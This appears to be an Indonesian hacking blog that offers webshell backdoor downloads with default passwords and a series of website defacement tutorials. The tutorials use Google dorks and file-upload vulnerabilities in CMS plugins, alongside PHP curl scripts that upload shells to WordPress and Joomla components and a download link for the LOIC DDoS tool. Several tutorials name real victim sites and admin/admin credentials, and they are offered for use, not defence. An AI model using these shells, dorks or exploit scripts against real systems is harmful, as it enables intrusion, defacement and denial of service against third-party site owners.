UCI
Private Blog
System OS :Linux server.google.com 2.6.32-431.5.1.el6.x86_64 #1 SMP Wed Feb 12 00:41:43 UTC 2014 x86_64
today : | at : | safemode : ON
> / home / facebook / twitter / exit /
name author perms com modified label

Kumpulan Shell Backdoor Fahmi J rwxr-xr-x 0 00.11

Filename Kumpulan Shell Backdoor
Permission rw-r--r--
Author Fahmi J
Date and Time 00.11
Label
Action
nih shell buat di tanem..
pasti bagus dah XD

  • Download Shell b374k 2.1

Fitur dan keunggulan :

Karena ini adalah versi aslinya [belum dikembangkan], maka fitur di shell ini bisa dibilang standar. Namun yang menjadi salah satu keunggulan shell ini adalah penggunaan password saat masuk ke shell. Jadi shell ini hanya bisa digunakan oleh pemasangnya sendiri [ privat shell ]. Dan mungkin yang menjadi kelebihan adalah karena shell ini diencode, ukurannya pun menjadi kecil. Ukurannya hanya 30kb. Sehingga sangat ringan.

  • Download Shell b374k 2.1 : here
  • Pass : maduracyber
Just info, password default shell ini adalah : kerinci
Anda bisa mengubah passwordnya namun harus bertipe md5

  • Nabilaholic Private Shell - JKT48 WebShell

Ini beberapa fiturnya :
E-Mail
Symlink
Config
WP BruteForce
Cpanel Cracker
Password Hash
SQLi Scanner
Zone-H Submit
Dll...

link :here
Size : 85kb

Default password : jkt48 [you can change it by MD5 encrypt password]


  • Download 1n73ct10n WebShell [b374k Recode]

Fiturnya sendiri sangat luar biasa. Mulai dari :
Wordpress Bruteforce
Joomla Bruteforce
Admin Finder
Symlink
SQLi Scanner
Config
dan masih banyak lagi.
Dan yang membuat saya heran adalah ukuran shell ini yang "tidak masuk akal" . Dengan fitur super komplit, ukurannya hanya 2kb !!!!! Jadi sangat ringan untuk diakses. Dan seperti b374k recode lainnya, shell ini juga dilindingi password. Password defaultnya adalah 1n73ction . Namun kalian bisa mengubahnya sendiri dengan bentuk md5 .
Bagi yang belum punya, silahkan donload disini :here
RARnya saya beri password. password : nabilah
  • Madspot Shell V2

    Fitur :
    SQL
    Hash
    Back Connect
    Symlink
    DDoS
    Submit Zone-H
    Kill Shell
    Dan satu lagi keunggulan shell ini, yaitu keberadaannya yang tidak terdeteksi oleh google. Sehingga tidak ada yang bisa menemukan shell kita dengan google dork.
Download : Here
Password RAR : nabilah

segitu dulu tar ane tambah lagi :D

Sumber : Madura Cyber

Deface dengan com_acclasif Fahmi J rwxr-xr-x 0 00.05

Filename Deface dengan com_acclasif
Permission rw-r--r--
Author Fahmi J
Date and Time 00.05
Label
Action
Ini exploit lama sih. tapi baru nemu tadi di grup. Yaudah sekalian share di blog. Mungkin berguna buat newbie seperti saya . =)).
Oke, langsung saja.
Bahan :
1. backdoor shell, file .html / .txt
2. dork : inurl:"index.php?option=com_aclassif"
3. Exploit : index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1
Langsung saja kita cari target di google dengan dork diatas.

Sebagai contoh, saya dapet target http://www.stabledock.com/
masukkan exploitnya menjadi : http://www.stabledock.com/index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1
 https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRnGbDUZdBGDxceVuLsfhsKkNW6oW1CUO0jJI7Dh6tHrYWeIfUsDGI3rI3eZeHF5QAy6a4qhepeXX81Sd7P0Oa55D-R8CLxpwnKxJNAbLeONNEdXmZVLsVJnNXJAp7wyOtyNCuKetCAdMd/s320/step1.png
Tinggal isi data datanya. Boleh ngasal kok. Terakhir, upload filenya di attachment .
NB : beberapa situs memungkinkan kita untuk upload file .php dan .html , namun ada juga yang hanya bisa upload .txt seperti situs diatas.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2MSXwKrds9_WeXcDw62mN1K3-vET6OmyJyPIOOWpqBxGFeSf5tsWHSkRXndXhSdwH9sI5oWXUrPu8tl9kbjebEYKJj31520a9s4HYWNXFuPetDvQXqQVGjHk7o8_HFOdEOuC0cODInGl0/s320/step2.png
Jika sudah, tinggal klik link yang ada di keterangan seperti gambar diatas.
http://www.stabledock.com/components/com_aclassif/photos/mtmd23.txt

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEEaDRkcikOkCLVZZ8qCw_j_pmQmg-FatUu_hahwkEdku1DMjv21zgAowh7RVAUw3wAbfEIRWm7ESyCY3MEiXdtoqk8lG4o8Z7foZEUXfKxKjmz1quYXPmaACOdaj5RAdtEtVvm8cJXh99/s320/step2.png
Sekian tutorial kali ini. Semoga bermanfaat.

Sumber : Madura Cyber

Deface dengan teknik Exploit Libretto CMS 2.2.2 Malicious File Upload Fahmi J rwxr-xr-x 0 00.02

Filename Deface dengan teknik Exploit Libretto CMS 2.2.2 Malicious File Upload
Permission rw-r--r--
Author Fahmi J
Date and Time 00.02
Label
Action
Assalamu'alaikum

Kali ini saya akan share teknik deface dengan exploit  LibrettoCMS 2.2.2 Malicious File Upload. Exploitnya sangat mudah dipraktekkan terutama bagi para newbie seperti saya.
Oke langsung saja :

Bahan :
Shell php yang telah direname menjadi shell.doc
Dork :


inurl:js/ckeditor/plugins/pgrfilemanager
inurl:pgrfileManager.php
intitle:PGRFileManager v

atau apapun yg berkaitan sama PGRFileManager.php

Exploit :
http://target/librettoCMS/adm/ui/js/ckeditor/plugins/pgrfilemanager/PGRFileManager.php

Step by Step :
Mulai berselancar di google. Cari target yang sabar. Misalnya saya pilih

http://www.bluespacethinking.com/assets/js/plugins/ckeditor/plugins/pgrfilemanager/css/le-frog/
Ubah menjadi
http://www.bluespacethinking.com/assets/js/plugins/ckeditor/plugins/pgrfilemanager/PGRFileManager.php

Upload shell yang telah direname menjadi shell.doc.
Lihat gambar :
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLN_7yYYHnYpTlLUPEZze6XrWd4zRsPXqqcyUoLqp6Fgns4Hyw5s3tv-nrmc8OCRDpUpZJSGzfepi8aojhe4GPLLfs8obwFZ8CvJl9l9DhYl7WOM9hG4AeG2YoUl00cvaJ06GXXoQOdNlG/s320/step1.png

Setelah upload berhasil, rename shellnya menjadi shell.php
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaHU6V7wu_SfBZOkd0kS1k2FXSjmg01bsyP9KRxupITCUxd9XnbhPOPXjzNJJFghwzjuG9AZYFl1dmGjxA3O2JlhjUMc1PHzWNe6CfcP93mCK1JOboTsrzbGlpopv1MDm6B76rJo8JcNpA/s320/step2.png

Akses shellnya di site/assets/user/shell.php
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil_UvHw3bkHJncbeDN6tD7xTKoB7-I8Y2Tn3q_zBW-h_DfC8xxBxUs61edL5p6Q8_5Bax5v_CpIpEpdvrI-bLsFrZPN57MMqvefhiBHhmfuRKlhMAZLde-4oLomala9EDOnA6bZMYchrq8/s320/step3.png
Hajar index. :)
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb1ErYDCwsh4h5WezyuTcjdKT4Y-gVuOTpScqpCpqQ9oLoaTNysjm9xccXef17tgcvnEbM9PZz8i5mn8JbJNME4s9Peq-_EcKfGqCX214quutETpZ-_-7TRU5MkxiqnNLIilvwnNouNt1x/s320/done.png

Sekian Tutor ini cukup mudah tapi.. sulit mencari tempat akses shell setiap site berbeda beda jadi keep trying gan :D

Sumber : Madura Cyber

List Domain Dunia Fahmi J rwxr-xr-x 0 09.26

Filename List Domain Dunia
Permission rw-r--r--
Author Fahmi J
Date and Time 09.26
Label
Action
Berikut adalah domain2 situs yang ada didunia

  1. .ac Ascension Island 
  2. .ad Andorra 
  3. .ae United Arab Emirates 
  4. .af Afghanistan  
  5. .ag Antigua and Barbuda  
  6. .ai Anguilla  
  7. .al Albania  
  8. .am Armenia  
  9. .an Netherlands Antilles  
  10. .ao Angola  
  11. .aq Antarctica
  12. .ar Argentina  
  13. .as American Samoa  
  14. .at Austria 
  15. .au Australia
  16. .aw Aruba  
  17. .ax Åland  
  18. .az Azerbaijan  
  19. .ba Bosnia and Herzegovina 
  20. .bb Barbados 
  21. .bd Bangladesh  
  22. .be Belgium  
  23. .bf Burkina Faso  
  24. .bg Bulgaria  
  25. .bh Bahrain 
  26. .bi Burundi 
  27. .bj Benin  
  28. .bm Bermuda 
  29. .bn Brunei Darussalam 
  30. .bo Bolivia 
  31. .br Brazil  
  32. .bs Bahamas 
  33. .bt Bhutan  
  34. .bv Bouvet Island
  35. .bw Botswana  
  36. .by Belarus  
  37. .bz Belize  
  38. .ca Canada
  39. .cc Cocos (Keeling) Islands  
  40. .cd Democratic Republic of the Congo tadinya Zaire
  41. .cf Central African Republic  
  42. .cg Republic of the Congo  
  43. .ch Switzerland
  44. .ci Côte d’Ivoire  
  45. .ck Cook Islands  
  46. .cl Chile
  47. .cm Cameroon
  48. .cn hanya untuk China Daratan: Hong Kong dan Macau menggunakan TLD berbeda.
  49. .co Colombia 
  50. .cr Costa Rica  
  51. .cu Cuba 
  52. .cv Cape Verde 
  53. .cx Christmas Island  
  54. .cy Cyprus  
  55. .cz Czech Republic  
  56. .de Germany (Deutschland) 
  57. .dj Djibouti  
  58. .dk Denmark  
  59. .dm Dominica  
  60. .do Dominican Republic 
  61. .dz Algeria (Dzayer)
  62. .ec Ecuador  
  63. .ee Estonia
  64. .eg Egypt  
  65. .er Eritrea  
  66. .es Spain (España)  
  67. .et Ethiopia  
  68. .eu European Union
  69. .fi Finland  
  70. .fj Fiji  
  71. .fk Falkland Islands  
  72. .fm Federated States of Micronesia
  73. .fo Faroe Islands  
  74. .fr France
  75. .ga Gabon  
  76. .gb United Kingdom jarang digunakan; primary ccTLD yang sering digunakan ialah .uk untuk United Kingdom
  77. .gd Grenada  
  78. .ge Georgia  
  79. .gf French Guiana  
  80. .gg Guernsey  
  81. .gh Ghana  
  82. .gi Gibraltar  
  83. .gl Greenland  
  84. .gm The Gambia  
  85. .gn Guinea  
  86. .gp Guadeloupe  
  87. .gq Equatorial Guinea  
  88. .gr Greece  
  89. .gs South Georgia and the South Sandwich Islands  
  90. .gt Guatemala  
  91. .gu Guam  
  92. .gw Guinea-Bissau  
  93. .gy Guyana  
  94. .hk Hong Kong Special administrative region dari People’s Republic of China.
  95. .hm Heard Island and McDonald Islands  
  96. .hn Honduras  
  97. .hr Croatia (Hrvatska)  
  98. .ht Haiti  
  99. .hu Hungary  
  100. .id Indonesia  
  101. .ie Ireland (Éire)
  102. .il Israel  
  103. .im Isle of Man  
  104. .in India
  105. .io British Indian Ocean Territory  
  106. .iq Iraq  
  107. .ir Iran  
  108. .is Iceland (Ísland)  
  109. .it Italy
  110. .je Jersey  
  111. .jm Jamaica 
  112. .jo Jordan  
  113. .jp Japan  
  114. .ke Kenya  
  115. .kg Kyrgyzstan 
  116. .kh Cambodia (Khmer)  
  117. .ki Kiribati  
  118. .km Comoros 
  119. .kn Saint Kitts and Nevis  
  120. .kp North Korea  
  121. .kr South Korea  
  122. .kw Kuwait  
  123. .ky Cayman Islands  
  124. .kz Kazakhstan  
  125. .la Laos kini dipasarkan sebagai domain official untuk Los Angeles.
  126. .lb Lebanon  
  127. .lc Saint Lucia  
  128. .li Liechtenstein  
  129. .lk Sri Lanka  
  130. .lr Liberia  
  131. .ls Lesotho  
  132. .lt Lithuania  
  133. .lu Luxembourg  
  134. .lv Latvia 
  135. .ly Libya  
  136. .ma Morocco  
  137. .mc Monaco  
  138. .md Moldova  
  139. .me Montenegro
  140. .mg Madagascar  
  141. .mh Marshall Islands  
  142. .mk Republic of Macedonia  
  143. .ml Mali  
  144. .mm Myanmar  
  145. .mn Mongolia  
  146. .mo Macau Special administrative region dari People’s Republic of China.
  147. .mp Northern Mariana Islands  
  148. .mq Martinique  
  149. .mr Mauritania  
  150. .ms Montserrat  
  151. .mt Malta  
  152. .mu Mauritius  
  153. .mv Maldives 
  154. .mw Malawi  
  155. .mx Mexico  
  156. .my Malaysia 
  157. .mz Mozambique  
  158. .na Namibia  
  159. .nc New Caledonia  
  160. .ne Niger  
  161. .nf Norfolk Island  
  162. .ng Nigeria  
  163. .ni Nicaragua  
  164. .nl Netherlands  
  165. .no Norway
  166. .np Nepal  
  167. .nr Nauru  
  168. .nu Niue Biasa digunakan untuk website-website Scandinavian dan Dutch, karena dalam bahasa mereka ‘nu’ berarti ‘now’.
  169. .nz New Zealand  
  170. .om Oman  
  171. .pa Panama  
  172. .pe Peru  
  173. .pf French Polynesia dengan Clipperton Island
  174. .pg Papua New Guinea  
  175. .ph Philippines  
  176. .pk Pakistan  
  177. .pl Poland  
  178. .pm Saint-Pierre and Miquelon  
  179. .pn Pitcairn Islands  
  180. .pr Puerto Rico  
  181. .ps Palestinian territories di bawah kontrol PA yang meliputi Tepi Barat (West Bank) dan Jalur Gaza (Gaza Strip)
  182. .pt Portugal
  183. .pw Palau  
  184. .py Paraguay  
  185. .qa Qatar  
  186. .re Réunion 
  187. .ro Romania  
  188. .rs Serbia  
  189. .ru Russia  
  190. .rw Rwanda  
  191. .sa Saudi Arabia  
  192. .sb Solomon Islands  
  193. .sc Seychelles  
  194. .sd Sudan  
  195. .se Sweden  
  196. .sg Singapore  
  197. .sh Saint Helena  
  198. .si Slovenia  
  199. .sj Svalbard dan Jan Mayen
  200. .sk Slovakia  
  201. .sl Sierra Leone  
  202. .sm San Marino  
  203. .sn Senegal  
  204. .so Somalia 
  205. .sr Suriname  
  206. .st São Tomé and Príncipe  
  207. .su tadinya Soviet Union
  208. .sv El Salvador  
  209. .sy Syria  
  210. .sz Swaziland  
  211. .tc Turks and Caicos Islands  
  212. .td Chad  
  213. .tf French Southern and Antarctic Lands  
  214. .tg Togo  
  215. .th Thailand  
  216. .tj Tajikistan  
  217. .tk Tokelau
  218. .tl East Timor
  219. .tm Turkmenistan  
  220. .tn Tunisia  
  221. .to Tonga  
  222. .tp East Timor
  223. .tr Turkey 
  224. .tt Trinidad and Tobago 
  225. .tv Tuvalu nama domain yang banyak digunakan oleh stasiun televisi.
  226. .tw Taiwan, Republic of China
  227. .tz Tanzania  
  228. .ua Ukraine 
  229. .ug Uganda  
  230. .uk United Kingdom  
  231. .um United States Minor Outlying Islands  
  232. .us United States of America Biasa digunakan oleh U.S. State dan local governments daripada TLD .gov  
  233. .uy Uruguay  
  234. .uz Uzbekistan  
  235. .va Vatican City State 
  236. .vc Saint Vincent and the Grenadines 
  237. .ve Venezuela  
  238. .vg British Virgin Islands 
  239. .vi U.S. Virgin Islands  
  240. .vn Vietnam 
  241. .vu Vanuatu  
  242. .wf Wallis and Futuna  
  243. .ws Samoa tadinya Western Samoa
  244. .ye Yemen 
  245. .yt Mayotte 
  246. .yu Yugoslavia Kini digunakan untuk Serbia dan Montenegro
  247. .za South Africa (Zuid-Afrika)  
  248. .zm Zambia 
  249. .zw Zimbabwe

deface dengan "CMS admin Image Uploader" Shell Upload Vulnerability Fahmi J rwxr-xr-x 0 09.21

Filename deface dengan "CMS admin Image Uploader" Shell Upload Vulnerability
Permission rw-r--r--
Author Fahmi J
Date and Time 09.21
Label
Action
"CMS admin Image Uploader" Shell Upload Vulnerability


Google Dorks:
inurl: "default_image.asp"
inurl: "default_imagen.asp"
inurl: "/ box_image.htm"

Anda akan mendapat pilihan unggah setelah mengklik link yang Anda punya dengan menggunakan Dorks.
Sekarang pilih deface Anda, atau shell dan upload Big Grin
Format:
shell.asp,. jpg, shell.php;.. html php jpg, gif, jpg, png, pdf, zip......

Anda dapat menggunakan data Tamper juga ...

Live Demo:
http://www.pballcentral.com/admin% 5Cincl ... _image.asp


=====================================================

[#] Wordpress ..... brainstorming meng-upload shell [#]
permintaan:

1 º Shell: THA.php di tempat yang sama
2 º Buat file: inject.php (Jalankan secara online atau dengan xampp)

PHP code:
<?php
$uploadfile="THA.php";
$ch = curl_init("http://target.com/wordpress/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wordpress/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
?>

Google Dork:
inurl :/ wp-content/themes/brainstorm / situs:


Contoh target tanpa link edit:
http://www.kscm.ie/wp-content/themes/bra...?post_id=9

diubah:
/ wp-content/themes/brainstorm/scripts/piecemaker/piecemaker-xml.php? post_id = 9
untuk
/ wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php


Contoh Jumlah:
http://www.kscm.ie/wp-content/themes/bra...oadify.php

cari u shell di sini:
http://target/wp-content/uploads/year/month/THA.php

contoh
http://www.kscm.ie/wp-content/uploads/2013/08/THA.php

====================================================

WordPress GeoPlaces Themes (Upload shell exploit)

# Exploit Title: WordPress GeoPlaces Themes >> upload shell exploit
# Google Dork: "inurl:wp-content/themes/GeoPlaces/"
# Date: 2/6/2013
# Exploit Author: xmayaroos
# Vendor Homepage: http://www.geotheme.com/
# Version: [app version - REQUIRED]
# Tested on: [relevant os]
# Greeting To : sec4ever members

/wp-content/themes/GeoPlaces/monetize/upload/

find your shell

/wp-content/uploads/2013/08 (Year / Month)


===================================================

Joomla com_extplorer Components shell upload Vulnerability
#################################

# ISlamic Republic Of Iran Security Team

# http://Www.IrIsT.Ir

#################################

# Exploit Title : joomla com_extplorer Components shell upload Vulnerability

# Author : IrIsT Security & Researcher Team

# Discovered By : Am!r

# Home : http://IrIsT.Ir - http://IrIsT.Ir/forum

# Facebook Page : http://www.facebook.com/pages/IrIsT-Hack...7267857573

# Software Link : http://www.joomla.org

# Security Risk : High

# Tested on : Linux

# Dork : inurl:administrator/components/com_extplorer

#################################
Exploit :

Post.php

<?php

$uploadfile="Amir.php.gif";

$ch =
curl_init("http://www.exemple.com/administrator/components/com_extplorer/uploadhandler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.exemple.com/images/stories/Amir.php.gif

#################################

# Greats : B3HZ4D - C0dex - TaK.FaNaR - F@rid - Beni_Vanda - dr.koderz - Mr Zer0 - Smartprogrammer - z3r0

# sajjad13and11 - silent - Bl4ck M4n - AHAAD - ARTA - Dj.TiniVini - E2MA3N - Immortal Boy - IR Anonymous

# Mikili - Mr.F@RDIN - Net.W0lf - skote_vahshat - Net.W0lf - MedRiK - 4xp3r-bh - Sokout - mehdiv - soulz

# & All Members In IrIsT.Ir

#################################

#Tnx To : PacketstormSecurity.Org - 1337day.com - exploit-db.com

#################################


=============================================

Dork : allinurl:index.php?db=information_schema


Go to google.com and enter this dork, google will show you About 161,000 results guess how many website are vulnerable for this attack !


This dork bypasses the admin username and pass and takes You directly to information schema tables to get data and You can delete data!!!!
===================================================

Wordpress theme GTD File Upload Vulnerability. #Google Dork: inurl:"/wp-content/themes/GTD/upload/" or allintext:"powered by WordPress. GTD theme by Templatic"

[+]exploit
-----------------------------------------------------------------------
example : http://localhost/wp-content/themes/GTD/upload/

Shell access: http://localhost/wp-content/themes/GTD/attachments/yourshell.php

Enjoy Brothers!


Translate sendiri !
Gue cuman share aja XD
Kalo dah dewo jangan lupa temen :D
Titip nick ./Shanjunisme98

Sumber : Exploit DB

Low Orbit Ion Cannon Fahmi J rwxr-xr-x 0 09.19

Filename Low Orbit Ion Cannon
Permission rw-r--r--
Author Fahmi J
Date and Time 09.19
Label
Action
Bagi2 Low Orbit Ion Cannon dulu

sedikit penjelasan :
LOIC atau Low Orbit Ion Cannon merupakan sebuah tool/aplikasi yg di design oleh 4chan, Praetox (CMIIW.. gw sendiri kurang begitu jelas siapa penciptanya :D). LOIC sering digunakan untuk serangan DDoS (Distributed Denial of Service) pada website.

Akhir2x ini LOIC menjadi populer semenjak serangan2x yg dilakukan oleh hacktivis Anonymous pd beberapa web besar. Anonymous sendiri sering menggunakan LOIC dalam operasinya, dan tentu saja ditambah dgn tool2x lain dan teknik2x tersendiri yg hanya mereka sendiri yg tau

Lalu kenapa LOIC begitu "berbahaya" ??

Karena LOIC begitu mudah digunakannya. Kita tinggal memasukkan dan mengunci URL target, pilih2x metode penyerangan, attack, dan tinggal tunggu hasil; maka target website tsb akan down, tidak bisa diakses, dan terkadang bisa menyebabkan kerusakan pd server web tsb.

LOIC akan menjadi bergitu berbahaya jika si penyerang mempunyai "sumber daya" yg besar dalam menggunakan LOIC.

Download di sini : http://sourceforge.net/projects/loic/files/latest/download


Deface dengan teknik Shop 373 Fahmi J rwxr-xr-x 0 09.15

Filename Deface dengan teknik Shop 373
Permission rw-r--r--
Author Fahmi J
Date and Time 09.15
Label
Action
Assalamu'alaikum
Oke, kali ini saya akan share salah satu teknik deface dengan Exploit Shop737 File Upload Vulnerability. Maaf kalo judulnya salah. Itu cuma ngarang sendiri. Soalnya sumber awal yang jadi refrensi saya juga bingung dikasih judul apa.
Oke langsung saja.
Bahan :

1. Google Dork : intext:"Powered by Shop737"  <- Use your brain ! Dork silahkan dikembangkan sendiri. :p
2. File berformat .txt

Langkah-langkah :
1. Langsung saja berselancar di google.com dengan dork diatas. lalu pilih salah satu web. Sebagai contoh saya pilih http://balimalio.com/poto/
2. Masukkan exploitnya. site/poto/upload.php . Jadi untuk contoh menjadi http://balimalio.com/poto/upload.php
3. nanti jika suruh memasukkan password sama username isi saja :
User : admin
Password : admin
4. Maka akan masuk ke tempat uploadnya.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDgwhl_an1TwYBkL7HfvUGuR4wA3F1QCvpIsTOlh2tsJwQF9cnoOHbrIMovtfuh8WQSgkVeQuRzorjCWAzDV0KTSEqchtZLuiPL9uI0ddDHMuXgPn9Csdvp6RbVV67y8GSDf9Es-3zLjWO/s320/737-1.png

Oke, tinggal diisi. Form atas untuk membuat kategori baru. Untuk contoh saya buat kategori baru dengan nama jcvan . Lalu klik buat kategori.
Upload ke : pilih folder tempat file akan diupload. Untuk contoh saya upload ke folder yang tadi saya buat yaitu ke folder jcvan .
File yang diupload : klik pilih berkas dan upload file berformat jpg atau txt
Lalu klik Upload di paling bawah.
5. Jika upload sudah selesai, sekarang kita panggil filenya. letaknya ada di site/poto/[folder]/file.txt
Maka file saya akan berada di http://balimalio.com/poto/jcvan/jj.txt


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjijK9c1Vi6Gm52N0Uvql9i428lWE2SlVnyOh-IvX-ERWrC0zGiXYzxQd9YDdKopHwNRYQe4dRIVv7dwtCi3vxVQ_YH8DTGLau7yJpcEoK0BrWjdNhwxlUV5VLfftj0FGhAGlZeUMRh3MXN/s320/jeje.png


Uploaded by Newbie_Inside .
I Love You Jessica Vania. :*
Problem ??

Sekian tutorial kali ini. Semoga bermanfaat.
Refrensi : IDCA

Deface dengan teknik Ajax File Manager | File Upload Vulnerability Fahmi J rwxr-xr-x 0 09.13

Filename Deface dengan teknik Ajax File Manager | File Upload Vulnerability
Permission rw-r--r--
Author Fahmi J
Date and Time 09.13
Label
Action
Assalamu'alaikum

Kali ini saya akan share cara deface dengan exploit Ajax File Manager | File Upload Vulnerability. Exploitnya sangat mudah dipraktekkan. Cocok bagi newbie yang baru belajar deface. :) .
Oke, langsung saja kita mulai. Hehehehehe.
. Dork :
inurl:"ajaxfilemanager.php?page=" intitle:"ajax file manager" (kembangkan sendiri)
. File berekstensi .txt

Langkah Langkah :
1. Mulai cari target di google dengan dork diatas. :)
Sebagai contoh, saya pilih http://www.szfo-redcross.ru/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?page=22

2. Lalu klik tombol upload di pojok kanan atas.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl7s9HG7mRQSp4sz_y7CxeYFDkHUwXvo6TpbuOToy_LKAT5AvH9e6wdQ3TvvOlS1CMF0XwYXk6HnMK8KMxuZU_v0TeVfGFmMi08Zw8FDTjc9Md8rRu-fC3dGpxqVTT8eedw3A7uBkGTwWF/s320/step1.png

3. Kemudian upload file sobat. File harus berekstensi .txt . Sebaagi contoh, saya menguplaod filedengan nama jeje.txt

4. Jika sudah, klik file yang tadi sobat upload.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNkut5ZDknAbDq6OZSoy5ELNGQhJpPM4dr1BtW0cNSIQ5NwTBBNQezmnCX3aipIgnP8cOtsTUegrabkP4EO2gvJirVoN40YSXbDuW_OTdWXEfgkacrPXfAWuYw3BaR7GwJ7TQAVAkxkiI4/s1600/step2.png


5. Akan terbuka link dimana file sobat berada. :)

http://www.szfo-redcross.ru/tiny_mce/plugins/uploaded/jeje.txt


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Yyj6p6fZrYnyoV-2HFY7O1bHrZ1ZfluK8cbkFG4AUJryK2K9OGwbqfdvzhFzoCH5w-jCUsltmlWLRcjs2nxDJd1RBI8FSs6XvMqMkggq2VWVfOJlsoQuadVeY3J167hZrGgd6z2wXPCc/s320/step3.png

Sekian tutorial kali ini. Semoga bermanfaat. :)

Source : Madura Cyber

Deface dengan CMS Webconstructor File Upload Vulnerability Fahmi J rwxr-xr-x 0 09.11

Filename Deface dengan CMS Webconstructor File Upload Vulnerability
Permission rw-r--r--
Author Fahmi J
Date and Time 09.11
Label
Action
Assalamu'alaikum

Kali ini saya akan share teknik deface yang kemarin saya dapat dari bang ENno. Tekniknya cukup mudah terutama bagi yang newbie culun seperti saya. :v

Oke, langsung saja.
Bahan :

  • Google Dork : inurl:tiny_mce/plugins/filemanager [untuk dork lain silahkan dikembangkan sendiri]
  • Exploit : [localhost]/PATH/tiny_mce/plugins/filemanager/insertfile/insert_file.php

Sekarang kita mulai prakteknya.

  1. Buka google dan cari target dengan dork diatas.
  2. Sebagai contoh saya pilih http://rofel.pl/tiny_mce/plugins/filemanager/
  3. masukkan exploitnya sehingga menjadi http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
  4. Upload filenya. Sebagai contoh saya upload file dengan nama suram.html
  5. Jika upload sukses, maka kalian akan melihat alamat filenya di bawah. Yaitu di http://rofel.pl/upload/suram.html
  6. Dan sekarang, foto nabilahJKT48 sudah terpasang di web tersebut. :v
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwoU0tcs02V-Hq15OJvUVbclNsS2m0dYv_TJnwQ9n6xZfUYy3eUBfcZ7gYuyBRXsXP3Hf9a1mD-PDq0Ty0NG1ePkZx7Mjnu9AKya0spQnYx0nq_56GolACy2W_NPBfNu5A6c0nisezoJte/s320/JKT48.png


Ekstensi file yang adpat diupload adalah html, pdf, txt, doc, jpg . Tidak support file .php sehingga tidak bisa upload shell.
CMS Webconstructor File Upload Vulnerability
Thanks to : ENNo Area

Hasil ane http://www.steulaliegites.com/tinymce/jscripts/tiny_mce/plugins/filemanager/files/~cddorg.html

Sumber : Madura Cyber

Deface dengan teknik Remote File Upload Vulnerability (RFUEV) Fahmi J rwxr-xr-x 0 09.08

Filename Deface dengan teknik Remote File Upload Vulnerability (RFUEV)
Permission rw-r--r--
Author Fahmi J
Date and Time 09.08
Label
Action
Ok, daripada lama-lama cerita, mending kita langsung aja ketutorialnya sob, Berikut Tutorial Deface dengan Teknik Remote File Upload Exploit Vulnerability :
Live Target : http://imobiliariaresende.com/editor/editor/filemanager/browser/mcpuk/images/icons/32/

Dork :
inurl:/editor/editor/filemanager/
inurl:/HTMLEditor/editor/"

1). Masukan salah satu dork diatas ke Seacrh Enginee Google.


2). Pilih salah satu website sebagai target.


3). Tampilan Webitenya nanti akan seperti ini.
http://prntscr.com/1ilcho

4). Kemudian kode ini :

editor/editor/filemanager/browser/mcpuk/images/icons/32/

5). Ganti dengan kode ini, Lalu enter :

editor/editor/filemanager/upload/test.html




6). Jika sudah, kamu ubah pada Select the "File Uploader" to use: Ubah dari ASP menjadi PHP.

7). Kemudian kamu klik Choose File, kamu pilih salah satu file HTML deface'an kamu.


8). Lalu klik Send it to the Server.


9). Jika berhasil nanti akan muncul notice jika file yang kamu upload berhasil tanpa eror, dan pada kotak ( Upload File URL ) akan memberikan patch dimana file kamu berada.


10). Copykan saja file yang ada di ( Upload File URL ) lalu taruh dibelakang site target, jadi nanti akan terlihat seperti ini :
http://www.buraevo.ru/UserFiles/_____.html

http://imobiliariaresende.com/editor/images/__.html

Ingat ya nick ane Mr.Router87... 

Sumber : Cirebon Cyber 4rt
 

Sh0uT0u7 © 2010 United Cyberspace of Indonesian